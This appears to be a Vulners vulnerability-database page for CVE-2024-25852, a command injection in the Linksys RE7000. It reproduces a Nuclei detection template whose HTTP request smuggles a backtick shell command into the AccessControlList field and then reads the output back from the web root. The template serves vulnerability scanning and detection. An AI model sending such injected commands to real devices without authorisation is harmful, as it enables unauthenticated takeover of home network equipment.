Vulners
Lucene search
Linksys RE7000 - Command Injection
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | The vulnerability of the AccessControlList component in the Linksys RE7000 router microprogramming system allows a intruder to increase their privileges. | 8 Dec 202500:00 | – | bdu_fstec |
 | CVE-2024-25852 | 22 Apr 202401:02 | – | circl |
 | Linksys RE7000 安全漏洞 | 11 Apr 202400:00 | – | cnnvd |
 | Linksys RE7000 Command Injection Vulnerability | 15 Apr 202400:00 | – | cnvd |
 | CVE-2024-25852 | 11 Apr 202400:00 | – | cve |
 | CVE-2024-25852 | 11 Apr 202400:00 | – | cvelist |
 | CVE-2024-25852 | 11 Apr 202421:15 | – | nvd |
 | CVE-2024-25852 | 11 Apr 202421:15 | – | osv |
 | PT-2024-21165 · Linksys · Linksys Re7000 | 11 Apr 202400:00 | – | ptsecurity |
 | CVE-2024-25852 | 23 May 202510:12 | – | redhatcve |
10
id: CVE-2024-25852
info:
name: Linksys RE7000 - Command Injection
author: s4e-io
severity: high
description: |
Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the "AccessControlList" parameter of the access control function point
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: An attacker can use the vulnerability to obtain device administrator rights.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-25852
- https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md
- https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd
classification:
epss-score: 0.16519
epss-percentile: 0.96598
metadata:
verified: true
max-request: 1
vendor: Linksys
product: RE7000
tags: cve,cve2024,unauth,injection,vkev,vuln
variables:
filename: "{{rand_base(5)}}"
http:
- raw:
- |
PUT /goform/AccessControl HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`"}
- raw:
- |
GET /{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")'
- "status_code_1 == 200 && status_code_2 == 200"
condition: and
# digest: 4a0a004730450220790abbccea1fcb5eb2e381424d1b0518410907c9d04ab91e87681cf1dcfb0589022100fada07eb2379f22c925dfae8ec6089df209afe971aadf28059f904c1ef6590ea:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.18.8
EPSS0.16519
SSVC